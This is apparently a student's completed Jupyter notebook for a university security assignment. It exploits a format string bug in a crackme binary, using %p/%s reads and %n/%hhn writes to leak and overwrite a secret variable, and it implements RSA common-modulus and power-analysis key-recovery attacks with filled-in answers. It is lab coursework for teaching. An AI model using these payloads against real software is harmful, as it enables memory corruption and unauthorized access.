# Exercise 3: Semantic Attacks

### Assignment Deadline: March 10 (Monday) before 11:59PM

**This assignment is worth 10% of the semester grade.**



In this project, we will explore two different types of semantic attacks, which exploit vulnerabilities caused by logical errors or confusions within the software. Generally, this type of vulnerabilities is harder to find, but once they are discovered and exposed, it can be harder to mitigated than memory vulerabilities such as buffer overflows.

## Part 1: Format String Vulnerability

For the first part, let's do some exercise regarding format string vulnerability. The format string vulnerability is a powerful class of bugs on the commonly-used `printf` function and its family (`sprintf`, fprintf`, etc).
This benign-looking bug allows arbitrary read/write and thus arbitrary execution. To conduct this attack, you do need to have some knowledge about the structure of program stacks and how variable-length arguments are implemented in C.

### Step 1.0: A vulnerable program crackme0x00



We start with a vulnerable program called `crackme0x00`:

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <err.h>

unsigned int secret = 0xdeadbeef;

void handle_failure(char *buf) {
  char msg[100];
  snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
  printf(msg);
}

int main(int argc, char *argv[])
{
  setreuid(geteuid(), geteuid());
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);

  int tmp = secret;

  char buf[100];
  printf("IOLI Crackme Level 0x00\n");
  printf("Password:");

  fgets(buf, sizeof(buf), stdin);

  if (!strcmp(buf, "250382\n")) {
    printf("Password OK :)\n");
  } else {
    handle_failure(buf);
  }

  if (tmp != secret) {
    puts("The secret is modified!\n");
  }
  
  return 0;
}
```

Now, let's download the program:

In [2]:
!wget -O crackme0x00 https://github.com/chiache/csce713-assignments/raw/master/lab3/crackme0x00
!chmod 755 crackme0x00

--2025-04-20 13:10:13--  https://github.com/chiache/csce713-assignments/raw/master/lab3/crackme0x00
Resolving github.com (github.com)... 140.82.114.4
Connecting to github.com (github.com)|140.82.114.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/chiache/csce713-assignments/master/lab3/crackme0x00 [following]
--2025-04-20 13:10:14--  https://raw.githubusercontent.com/chiache/csce713-assignments/master/lab3/crackme0x00
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15916 (16K) [application/octet-stream]
Saving to: ‘crackme0x00’

crackme0x00         100%[===================>]  15.54K  --.-KB/s    in 0.001s  

2025-04-20 13:10:14 (19.6 MB/s) - ‘crackme0x00’ saved [15916/15916]



When we type an incorrect password, it produces an error message like this:

In [3]:
!echo "asdf" | ./crackme0x00

zsh:1: exec format error: ./crackme0x00


In [3]:
!echo "250382" | ./crackme0x00

zsh:1: exec format error: ./crackme0x00


Unfortunately, this program is using `printf()` in a very insecure way.


```
snprintf(msg, sizeof(msg), "Invalid Password! %s\n", buf);
printf(msg);
```



Please note that msg might contain your input (e.g., invalid password). If it contains a special format specifier, like `%`, `printf()` interprets its format specifier, causing a security issue.

Let's try typing `%p`:

*   `%p`: pointer
*   `%s`: string
*   `%d`: integer
*   `%x`: hexadecimal interger

In [ ]:
!echo "%p" | ./crackme0x00

IOLI Crackme Level 0x00
Password:Invalid Password! 0x64



What was the output? Does it looks like an integer value? If so, you have successfully found the vulnerability. Now, let's go crazy by putting more `%p`: x 15:

In [ ]:
! echo "1=%p|2=%p|3=%p|4=%p|5=%p|6=%p|7=%p|8=%p|9=%p|10=%p|11=%p|12=%p|13=%p|14=%p|15=%p"  | ./crackme0x00

IOLI Crackme Level 0x00
Password:Invalid Password! 1=0x64|2=0x804a008|3=0xffc9dea8|4=0xf7f5aa40|5=0xf7f33f20|6=0x8048383|7=0xffc9dea8|8=0xffc9de40|9=0xf7f5ac0c|10=0x61766e49|11=0x2064696c|12=0x73736150|13=0x64726f77|14=0x3d312021|15=0x327c7025


Since it's so tedious to keep putting `%p`, printf-like functions provide a convenient way to point to the n-th arguments:

```
| %[nth]$p
(e.g., %1$p = first argument)
```

In [ ]:
!echo "%10\$p" | ./crackme0x00

IOLI Crackme Level 0x00
Password:Invalid Password! 0x61766e49



**NOTE. \\$ is to avoid the interpretation (e.g., $PATH) by the shell.**

It shall match the 10th stack value listed above.

### Step 1.1. Format String Bug to an Arbitrary Read


Let's exploit this format string bug to write an arbitrary value to an arbitrary memory region.

Have you noticed some interesting values in the stack?

```
4=0xf7f9d620
...
10=0x61766e49  'Inva'
11=0x2064696c  'lid '
12=0x73736150  'Pass'
13=0x64726f77  'word'
14=0x3d312021  '! 1='
15=0x327c7025  '%p|2'
```

It seems that what we put onto the stack is actually being interpreted as an argument. What's going on?

When you invoke a `printf()` function, your arguments passed through the stack are placed like these:

```
printf("%s", a1, a2 ...)

[ra]
[  ] --+
[a1]   |   a1: 1st arg, %1$s
[a2]   |   a2: 2nd arg, %2$s
[%s] <-+     : 3rd arg, %3$s
[..]
```

In this simple case, you can point to the %s (as value) with %3$s! It means you can 'read' (e.g., 4 bytes) an arbitrary memory region like this:

```
printf("\xaa\xaa\xaa\xaa%3$s", a1, a2 ...)

[ra ]
[   ] --+
[a1 ]   |
[a2 ]   |
[ptr] <-+
[.. ]
```

It reads (`%s`) 4 bytes at `0xaaaaaaaa` and prints out its value. In case of the target binary, where is your controllable input located in the stack (the N value in the below)?

The output should look like this (replace the N with certain value):
```
$ echo "BBAAAA%N\$p" | ./crackme0x00
IOLI Crackme Level 0x00
Password:Invalid Password! BBAAAA0x41414141
```

In [6]:
!echo "BBAAAA%15\$x" | ./crackme0x00

zsh:1: exec format error: ./crackme0x00


In [ ]:
!echo "BBAAAA%15\$s" | ./crackme0x00

IOLI Crackme Level 0x00
Password:/bin/bash: line 1: 12866 Done                    echo "BBAAAA%15\$s"
     12867 Segmentation fault      (core dumped) | ./crackme0x00


What happens when we replace %p with %s? How does it crash?

With %s it crashes as the memory address (0x41414141) it is going to access is not a valid memory location so it causes a segmentation fault.

**[TASK] Please add a cell below to read the secret value from the crackme0x00 program using the format string vulnerability.**

Note that you can locate the address of secret by using nm:


In [ ]:
!nm crackme0x00 | grep secret

0804c03c D secret


In [ ]:
!echo -e "BB\x3c\xc0\x04\x08 %15\$x" | ./crackme0x00

IOLI Crackme Level 0x00
Password:Invalid Password! BB<� 804c03c



In [ ]:
!echo -e "BB\x3c\xc0\x04\x08 %15\$p" | ./crackme0x00

IOLI Crackme Level 0x00
Password:Invalid Password! BB<� 0x804c03c



In [ ]:
!echo -e "BB\x3c\xc0\x04\x08 %15\$s" | ./crackme0x00

IOLI Crackme Level 0x00
Password:Invalid Password! BB<� ﾭ�



In [ ]:
!echo -e "%49\$x" | ./crackme0x00

IOLI Crackme Level 0x00
Password:Invalid Password! deadbeef



### Step 1.2. Format String Bug to an Arbitrary Write

In fact, `printf()` is very complex, and it supports a 'write': it writes the total number of bytes printed so far to the location you specified.

*   `%n`: write number of bytes printed (as an int)

```
printf("aaaa%n", &len);
```

`len` contains `4 = strlen("aaaa")` as a result.

Similar to the arbitrary read, you can also write to an arbitrary memory location like this:

```
printf("\xaa\xaa\xaa\xaa%3$n", a1, a2 ...)

[ra ]
[   ] --+
[a1 ]   |
[a2 ]   |
[ptr] <-+
[.. ]

*0xaaaaaaaa = 4 (i.e., \xaa x 4 are printed so far)
```

Then, how to write an arbitrary value? We need another useful specifier of printf:

```
| %[len]d
(e.g., %10d: print out 10 spacers)
```

To write 10 to 0xaaaaaaaa, you can print 6 more characters like this:

```
printf("\xaa\xaa\xaa\xaa%6d%3$n", a1, a2 ...)
                        ---
*0xaaaaaaaa = 10
```

By using this, you can write an arbitrary value to the arbitrary location. For example, you can write a value, `0xc0ffee`, to the location, `0xaaaaaaaa`:

### 1. You can either write four bytes at a time like this:

```
*(int *)0xaaaaaaaa = 0x000000ee
*(int *)0xaaaaaaab = 0x000000ff
*(int *)0xaaaaaaac = 0x000000c0
```

### 2. Or you can use these smaller size specifiers like below:

*   `%hn`: write the number of printed bytes as a short
*   `%hhn`: write the number of printed bytes as a byte

```
printf("\xaa\xaa\xaa\xaa%6d%3$hhn", a1, a2 ...)
                        ---
*(unsigned char*)0xaaaaaaaa = 0x10
```

so,

```
*(unsigned char*)0xaaaaaaaa = 0xee
*(unsigned char*)0xaaaaaaab = 0xff
*(unsigned char*)0xaaaaaaac = 0xc0
```

**[TASK] Please add a cell below to overwrite the secret value with `0xc0ffee` using the format string vulnerability:**

## Method 1

In [ ]:
!echo -e "BB\x3c\xc0\x04\x08%12648406c%15\$n" | ./crackme0x00 # 0x00c0ffee = 12648430

## Method 2

In [5]:
!echo -e "BB\x3e\xc0\x04\x08\x3c\xc0\x04\x08\x3d\xc0\x04\x08\x3f\xc0\x04\x08%156d%15\$hhn%46d%16\$hhn%17d%17\$hhn%1c%18\$hhn" | ./crackme0x00 | xxd # 0xc0 (192) --> 0xee (238) --> 0xff (255) -> 0x00 (256)

zsh:1: exec format error: ./crackme0x00


## For Debug

In [ ]:
!nm crackme0x00 | grep main

         U __libc_start_main@@GLIBC_2.0
080492fe T main


In [ ]:
!apt-get update && apt-get install -y gdb

Hit:1 http://security.ubuntu.com/ubuntu jammy-security InRelease
Hit:2 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu2204/x86_64  InRelease
Hit:3 https://cloud.r-project.org/bin/linux/ubuntu jammy-cran40/ InRelease
Hit:4 http://archive.ubuntu.com/ubuntu jammy InRelease
Hit:5 https://r2u.stat.illinois.edu/ubuntu jammy InRelease
Hit:6 http://archive.ubuntu.com/ubuntu jammy-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu jammy-backports InRelease
Hit:8 https://ppa.launchpadcontent.net/deadsnakes/ppa/ubuntu jammy InRelease
Hit:9 https://ppa.launchpadcontent.net/graphics-drivers/ppa/ubuntu jammy InRelease
Hit:10 https://ppa.launchpadcontent.net/ubuntugis/ppa/ubuntu jammy InRelease
Reading package lists... Done
W: Skipping acquire of configured file 'main/source/Sources' as repository 'https://r2u.stat.illinois.edu/ubuntu jammy InRelease' does not seem to provide it (sources.list entry misspelt?)
Reading package lists... Done
Building dependency tree... Done
Reading

In [ ]:
!gdb -q -ex "break *0x08049415" -ex "run < <(echo -en 'BB\x3e\xc0\x04\x08\x3c\xc0\x04\x08\x3d\xc0\x04\x08%160d%15\$hhn%46d%16\$hhn%17d%17\$hhn')" -ex "x/x 0x0804c03c" -ex "continue" -ex "quit" ./crackme0x00

Reading symbols from ./crackme0x00...
(No debugging symbols found in ./crackme0x00)
Breakpoint 1 at 0x8049415
Starting program: /content/crackme0x00 < <(echo -en 'BB\x3e\xc0\x04\x08\x3c\xc0\x04\x08\x3d\xc0\x04\x08%160d%15$hhn%46d%16$hhn%17d%17$hhn')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
IOLI Crackme Level 0x00
Password:Invalid Password! BB>�<�=�                                                                                                                                                             100                                     134520840           -14376

Breakpoint 1, 0x08049415 in main ()
0x804c03c <secret>:	0xdec0ffee
Continuing.
The secret is modified!

[Inferior 1 (process 13639) exited normally]


In [ ]:
!gdb -q -ex "break *0x08049415" -ex "run < <(echo -en 'BB\x3c\xc0\x04\x08%12648406c%15\$n')" -ex "x/x 0x0804c03c" -ex "continue" -ex "quit" ./crackme0x00

In [ ]:
!gdb -q -ex "break *0x08049415" -ex "run < <(echo -en 'BB\x3e\xc0\x04\x08\x3c\xc0\x04\x08\x3d\xc0\x04\x08\x3f\xc0\x04\x08%156d%15\$hhn%46d%16\$hhn%17d%17\$hhn%1c%18\$hhn')" -ex "x/x 0x0804c03c" -ex "continue" -ex "quit" ./crackme0x00

Reading symbols from ./crackme0x00...
(No debugging symbols found in ./crackme0x00)
Breakpoint 1 at 0x8049415
Starting program: /content/crackme0x00 < <(echo -en 'BB\x3e\xc0\x04\x08\x3c\xc0\x04\x08\x3d\xc0\x04\x08\x3f\xc0\x04\x08%156d%15$hhn%46d%16$hhn%17d%17$hhn%1c%18$hhn')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
IOLI Crackme Level 0x00
Password:Invalid Password! BB>�<�=�?�                                                                                                                                                         100                                     134520840           -14376@

Breakpoint 1, 0x08049415 in main ()
0x804c03c <secret>:	0x00c0ffee
Continuing.
The secret is modified!

[Inferior 1 (process 13679) exited normally]


## Part 2: RSA Attacks

In this part, we are exploring a type of attacks called cryptanalysis attacks, sometimes in the form of side-channel attacks. Cryptography algorithms, just like other applications, can have logical errors that lead to bugs and vulnerabilities. The results of logical errors in cryptography algorithms can range from failures of encryption or decryption to ease of deciphering without the keys or recovery of the encryption keys. Well-known broken or weak ciphers or secure hash algorithms include DES, MD5, and SHA-1.

We will be mainly targetting RSA (Rivest–Shamir–Adleman), a public-key encryption algorithm widely used in modern everyday applications. More particularly, RSA implementations can be found in PGP encryption, digital signatures, SSL, disk encryption etc.

### Step 2.0: Understanding RSA

We will first go into some basics of the RSA algorithm. If you want to know more details, here's an [article](https://www.geeksforgeeks.org/rsa-algorithm-cryptography/) for you to read.


RSA encryption uses a pair of parameters *(e, n)* to encrypt the message. Assuming the message is *M* (think of a simple integer number), you can encrypt the message as the follows:

**$C$ = $M^e$ mod $n$**


On the other hand, to decrypt the data, we use another pair of parameter *(d, n)*. Assuming the encrypted message is *C*, you can decrypt the message as the follows:


**$M$ = $C^d$ mod $n$**


The reason why this works is because *d* and *e* are selected in a way that ($d$ * $e$)  1 mod Φ(n), where Φ(n) (pronounced as 'phi') is the [Euler Totient Function](https://www.geeksforgeeks.org/eulers-totient-function/) of $n$. Here, $d$ is considered the [modular multiplicative inverse](https://www.geeksforgeeks.org/multiplicative-inverse-under-modulo-m/) of $e$ mod Φ(n).

Based on this concept, please complete the `encrypt()` and `decrypt()` functions in the following cell:

In [ ]:
def power(base, exp, m):
    res = 1
    base = base % m
    while exp > 0:
        if exp & 1:
            res = (res * base) % m
        base = (base * base) % m
        exp = exp // 2
    return res

# Function to find modular inverse of e modulo phi(n)
# Here we are calculating phi(n) using Hit and Trial Method
# but we can optimize it using Extended Euclidean Algorithm
def modInverse(e, phi):
    for d in range(2, phi):
        if (e * d) % phi == 1:
            return d
    return -1

# RSA Key Generation (p and q are hardcoded for now)
def generateKeys():
    p = 7919
    q = 1009

    n = p * q
    phi = (p - 1) * (q - 1)

    # Choose e, where 1 < e < phi(n) and gcd(e, phi(n)) == 1
    e = 0
    for e in range(2, phi):
        if gcd(e, phi) == 1:
            break

    # Compute d such that e * d ≡ 1 (mod phi(n))
    d = modInverse(e, phi)

    return e, d, n

# Function to calculate gcd
def gcd(a, b):
    while b != 0:
        a, b = b, a % b
    return a

# TODO: Encrypt message using public key (e, n)
def encrypt(m, e, n):
    if m >= n:
        raise ValueError("Message too large for the given key size")
    return power(m, e, n)

# TODO: Decrypt message using private key (d, n)
def decrypt(c, d, n):
    return power(c, d, n)

# Main execution
if __name__ == "__main__":

    # Key Generation
    e, d, n = generateKeys()

    print(f"Public Key (e, n): ({e}, {n})")
    print(f"Private Key (d, n): ({d}, {n})")

    # Message
    M = 123
    print(f"Original Message: {M}")

    # Encrypt the message
    C = encrypt(M, e, n)
    print(f"Encrypted Message: {C}")

    # Decrypt the message
    decrypted = decrypt(C, d, n)
    print(f"Decrypted Message (Should be the same as the original): {decrypted}")

Public Key (e, n): (5, 7990271)
Private Key (d, n): (1596269, 7990271)
Original Message: 123
Encrypted Message: 3332110
Decrypted Message (Should be the same as the original): 123


### Step 2.1: Common Modulus Attack

Suppose that Bob want’s to communicate with Alice and uses Alice’s public key (n, e₁) to encrypt messages with RSA. As always, Eve is eavesdropping on the messages. He sends a couple of messages successfully, but after a while due to a CPU overheating (or some other random reason) a bit has been flipped unexpectedly and the message is encrypted with a a faulty public key (n, e₂).

So given that Eve has access on the two different ciphertexts of the same message M that have been encrypted with different exponent but common modulus:

#### ct₁ = E₍ₙ, ₑ₁₎(M)

#### ct₂ = E₍ₙ, ₑ₂₎(M)

She can recover the plaintext if gcd(e₁, e₂) = 1 and gcd(ct₂, n)=1

#### The Math Behind the Common Modulus Attack

Recall that the RSA encryption works as follows:

**$C$ = $M^e$ mod $n$**

Here, we need to use a theorem called [Bezout's Theorem](https://math.mit.edu/~lguth/PolyMethod/lect13.pdf). You do not need to know all the details. In short, Bezout’s Theorem states that, if there are integers a and b, which are not both zero, then there are integers x and y such that:

**$xa$ + $yb$ = $gcd(a, b)$**


Back in our context, if gcd($e₁$, $e₂$)=1, then we have integers x and y such that:

**$xe₁$ + $ye₂$ = 1**


Now, by using the [Extended Euclidean algorithm](https://www.geeksforgeeks.org/euclidean-algorithms-basic-and-extended/) we can find x and y and then is easy to show that the plaintext can be recovered as follows (all math performed in the common modulo):

**${ct_1}^x$ * ${ct_2}^y$ = $(M^{e_1})^x$ * $(M^{e_2})^y$ mod $n$ = $M^{({e_1}x + {e_2}y)}$ mod $n$
= $M$ mod $n$**

Although the equation seems straightforward, is a little bit more complicated to evaluate it as normally y will be a negative integer. As such, ${{ct}_2}^y$ must be evaluated as follows:

${{ct}_2}^y$ = $(1/{{ct}_2})^{-y}$

where $1/{{ct}_2}$ is the multiplicative inverse of ${{ct}_2}$. For instance, suppose that we are operating in mod 7 (Z₇). The fraction 1/2 (2⁻¹) is in fact the multiplicative inverse of 2 which in that case is 4 (2x4 = 1 (mod 7)). Now here is the catch! According to Bezout's Theorem, if the denominator a and the modulus n are not co primes then the denominator is not invertible mod n. In other words the fraction 1/a is not valid. Something like dividing by 0 in regular arithmetic. So, for making ${{ct}_2}$ invertible in mod n, gcd(${{ct}_2}$, n)=1 must also hold (co-primes).

Now, in the following cell, please write the code to attack:

In [ ]:
import math

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise ValueError('Modular inverse does not exist.')
    else:
        return x % m


def attack(c1, c2, e1, e2, N):
    if math.gcd(e1, e2) != 1:
        raise ValueError("Exponents e1 and e2 must be coprime")
    if math.gcd(e1, e2) != 1:
        raise ValueError("Exponents e1 and e2 must be coprime")

    if math.gcd(c2, N) != 1:
        raise ValueError("gcd(c2, N) must be 1")

    # Find coefficients a, b such that a*e1 + b*e2 = 1
    _, a, b = egcd(e1, e2)

    # Check if c1 is invertible if a is negative
    if a < 0 and math.gcd(c1, N) != 1:
        raise ValueError("c1 is not invertible modulo N")

    # Calculate c1^a mod N
    if a < 0:
        c1_inv = modinv(c1, N)
        c1_result = pow(c1_inv, -a, N)
    else:
        c1_result = pow(c1, a, N)

    # Calculate c2^b mod N
    if b < 0:
        c2_inv = modinv(c2, N)
        c2_result = pow(c2_inv, -b, N)
    else:
        c2_result = pow(c2, b, N)

    # Combine to recover the original message: M = c1^a * c2^b mod N
    plaintext = (c1_result * c2_result) % N

    return plaintext

Now let's check the attack with some sample input:

In [ ]:
n = 103109065902334620226101162008793963504256027939117020091876799039690801944735604259018655534860183205031069083254290258577291605287053538752280231959857465853228851714786887294961873006234153079187216285516823832102424110934062954272346111907571393964363630079343598511602013316604641904852018969178919051627
ct1 = 98165528588897581357762737834689451362252757422664514540538121132831138195216264938258509140640778717781569080958991098729015566777580593509402612574625430419832053337731308491289074351255823858676879185727045495590514663530030231806055096448879914474800546120932100906434044055982738517132870631903309747388
e1 = 13
ct2 = 102475188247563848286945915380476667802602854876368431885335322709108972931825158123667293750369168229919151668978059761534237040449685498674713242003659107451198242719915205456598334223051250662805244834468165714315564160456345356775214718947496000390960566077219957635569079685758176360540536491609062295912
e2 = 15
print(f"Decrypted Message: {attack(ct1, ct2, e1, e2, n)}")

Decrypted Message: 126207244316550804821666916


### Step 2.2 Power Analysis Attack

In this step, we are exploring a different class of attacks called side channel attacks. When a computer is decrypting with RSA, it emits extra information such as power consumption which can reveal the decryption key ($d$). Let's recall that the decryption of RSA works as follows:

**$M$ = $C^d$ mod $n$**

In real implementation, the exponential part will be computed bit-by-bit based on each bit of $d$. According to each bit of $d$, different operations are performed:



*   If the bit is 0: Only one `square` operation is performed.
*   If the bit is 1: A `square` operation is performed, followed by a `multiply` operation.

In this case, we can observe higher power consumption when the bit being processed in $d$ is 1, and lower power consumption when the bit being processed in 0. In this step, you will analyze the following power consumption traces and recover the decryption key ($d$).


In [ ]:
!wget -O ptrace.trc https://github.com/chiache/csce713-assignments/raw/master/lab3/ptrace.trc

--2025-03-12 05:38:42--  https://github.com/chiache/csce713-assignments/raw/master/lab3/ptrace.trc
Resolving github.com (github.com)... 140.82.114.3
Connecting to github.com (github.com)|140.82.114.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/chiache/csce713-assignments/master/lab3/ptrace.trc [following]
--2025-03-12 05:38:43--  https://raw.githubusercontent.com/chiache/csce713-assignments/master/lab3/ptrace.trc
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 47033 (46K) [text/plain]
Saving to: ‘ptrace.trc’

ptrace.trc          100%[===================>]  45.93K  --.-KB/s    in 0.01s   

2025-03-12 05:38:43 (3.57 MB/s) - ‘ptrace.trc’ saved [47033/47033]



Now, finish the following Python code to analyze the power trace and recover the key.

In [ ]:
%%writefile ptrace-input.txt
4916db7caa1a0dfd3e9b9c7a2aa2bd68d15fc6771a4a75fc00d47cc40f81612854c3dad7f6b275d3d38925a0d44abb9ebd83db256919cc71a47ac84328f840ff6e3e6797ba05d78c57a0cc79722c0dca8c8ff48b74152040462ff445e44388f57a12585fac97a3ca2675c98154d47bf10976ebf0926e6bc2694b04194b2653308e7577da48497fbd88a0a97b20d09421ff9a0ad8ec7ebc67c9c61fd9cb54ef1e825ac5352b689b0d193e70db1c17af8967d93b71b865b81f8ec6db7a39e4fbb830ec2ed0f1ae8d3ae832e0b3b03904b7b46010669a5beb85352fe6f7c0f442ae01fd1376c9c2062b905da18516a90d780e416fc55235b3bd32595031821cc025b32bdcc01cfa5164047a2ceba7a77057a5464cfeb78ddf5145eb88024fc1932322edb501eb3bcf8d585dbdbe4b443542eea4f923611692e399d3cda77bcbcb8e94ce3c6245aaddfc799b6fe2be6e53ae098b2dfc0439ace971f43820173b8a1c5ef54352f714b53c29f3cf0fd88710e71042d7a89bebe34b0ee8713f47b44a6b3f89bcd85366b27e78a2f70d4b1135a3eecddd09d025176abfd15658b20cc75aa173d7998d3de2184b6d9fa8a8cd2591e98164e52a71698b24069c56eb4e549114f484e3cf5644f15dad5c5beb96fbbe83d6b3239af16b700cfbaa7086fc24f85e4c60d4d66ca6e7cc66f5ed48b9fde8937e0df7d86c68bb3b2a7edacaf157a8
adc2c22676ab14b78b7659f8a75856c79a54dce49523af451723669aa065ae6b32e826a810ae3ee2ff33483da8a8c1af20de575e09106462edeee5e4e92346ffcfd1ee352e07700cc2f6b8c4a2a6cc37c61fcdad0202c8504e7619f66d319e4ececdeffc379e4ac4de6761a2f279e2ba36debff57d56a953a14ef3bd27ee08747f7027b75e4f0e1730a03b566e183e2410b6d107f1fed4ab83cdbb5ef03d382d236dc91b924ad127cab4d482bf6d296f3d21bb1dce1d92f079899d3cc5ccbe2dc4e9b4653058af2d24fb096ecdec40c3ac678a74ac7e0e5c26b26cc7698d051892c00426cf39db9309e016216a3f8eaff275624b4cf160b373f240f9e6f6165cea30be8f496d00f77dd2eef66042c62054c70f25c0bad2c8f775f16fb521656a9803232ad32ed272220d2a5c795baf2c5d6076d09f32d4b56390129ed49904009be0cd4db5f25f269e239389b6ae42d6634bb9dceb4e9ff4c8918a384229fcea65d7f6812026edeb256759ef6c58f78897242105bb255c69b37d5fe80ebe10485bf351b86738409bc5894d6a045f18b07181283892ac724b65ea76daf36b995953657d2142564626104f77e3b25265ee383928dfbd1966f208fb17bd6a7d4619dc4ac5edf1705ecfeb5f5e8faa0a1a4907ff997232820a8079044ca5670b1b0fc4191c9297fb624d7f5c7ea6ec537aedea29265d827d482abb6415aa5ec5f761

Overwriting ptrace-input.txt


In [ ]:
def findKey(ptrace):
    """
        * Finds decryption key (d) by checking the ptrace.
        * Simply exploits the "exponentiation by squaring" (or square and multiply) implementation of decryption process
        * If a only a square operation is done (during iteration over the bits of d)
               then corresponding bit is 0
               o/w (both square ana multiply operation) then the corresponding bit is 1 in d
    :param ptrace: ptrace of decryption process as lst
    :return: d
    """
    # Compute a threshold to distinguish between a pure square vs. square+multiply operation.
    threshold = (max(ptrace) + min(ptrace)) / 2

    # Extract bits based on the threshold
    bits = []
    for pt in ptrace:
        if pt > threshold:
            bits.append('1')
        else:
            bits.append('0')

    # Return the binary string representation of the decryption key.
    return ''.join(bits)


def powerAnalysisAttack(ptrace, c, n):
    """
        Exploits RSA implementation by conducting a power analysis on decryption process.
            * Given c,n and ptrace of decryption process, this exploit tries to determine the decryption exponent (d)
            by analyzing the power changes during decryption.
            * After capturing d, m is decrypted easily as: m = c^d (mod n)
    :param ptrace: ptrace of decryption process as lst
    :param c: cipher text
    :param n: modulus
    :return: m (decrypted message)
    """
    d = int(findKey(ptrace), 2)
    m = decrypt(c, d, n)
    return m


"""
    Provide a "ptrace.trc" file that contains ptrace of decryption process
    Also provide c and n (one by one) from stdin
    m will be printed to stdout
"""
with open("ptrace.trc", "r") as inp:
    ptraceLst = list(map(float, inp.readlines()))
with open("ptrace-input.txt", "r") as inp:
  c = int(inp.readline(), 16)
  n = int(inp.readline(), 16)
msgAsInt = powerAnalysisAttack(ptraceLst, c, n)
print(bytes.fromhex(hex(msgAsInt).lstrip('0x')).decode('utf-8'))

One does not simply break RSA! or maybe can, i dunno


## Submission

Once you have finished this notebook, click "File > Download > Download as .ipynb" and upload the file to **Assignment 3** on Microsoft Teams and click "Turn In".

## Reference

*   https://tc.gts3.org/cs6265/2019/tut/tut05-fmtstr.html
*   [Stack Smashing as of Today](https://www.blackhat.com/presentations/bh-europe-09/Fritsch/Blackhat-Europe-2009-Fritsch-Bypassing-aslr-slides.pdf)
*   [The Advanced Return-into-lib(c) Exploits](http://phrack.org/issues/58/4.html)
*   [Exploiting Format String Vulnerabilities](https://cs155.stanford.edu/papers/formatstring-1.2.pdf)